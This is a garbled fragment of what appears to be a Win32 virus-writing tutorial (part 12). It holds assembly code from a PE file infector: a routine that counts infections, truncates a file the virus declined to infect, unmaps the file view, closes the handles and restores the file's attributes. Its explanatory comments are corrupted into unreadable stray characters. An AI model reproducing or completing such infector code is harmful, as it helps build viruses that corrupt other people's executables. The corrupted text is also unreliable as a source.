Win32


- 12


jmp UnMapFile ; , p, ..

;-------------------------------------; ; p p p ; ; PE ( 4Ch, p 'Reserved1'), ; ; , p p . ; ; ESI p , EDI , p ; ; EDX (: EDX = Old SizeOfRawData + ; ; PointerToRawData), p RVA, ; ; p. p, RVA, H ;) RVA ; ; pp VA, , , ; ; p RVA... p, ; ; ( , p p ; ; MapViewOfFile). p, , EDI VA, ; ; p p p. ECX p ; ; pp p p . ! ;) p ; ; p ... ; ;-------------------------------------;

NoInfect: dec byte ptr [ebp+infections] mov ecx,dword ptr [ebp+WFD_nFileSizeLow] call TruncFile

;-------------------------------------; ; p , p p p ; . p 1 pp p ; , p p. , p ; p ;). ;-------------------------------------;

UnMapFile: push dword ptr [ebp+MapAddress] ; p p call [ebp+_UnmapViewOfFile]

CloseMap: push dword ptr [ebp+MapHandle] ; p call [ebp+_CloseHandle]

CloseFile: push dword ptr [ebp+FileHandle] ; p call [ebp+_CloseHandle]

CantOpen: push dword ptr [ebp+WFD_dwFileAttributes] lea eax,[ebp+WFD_szFileName] ; p ; p push eax call [ebp+_SetFileAttributesA] ret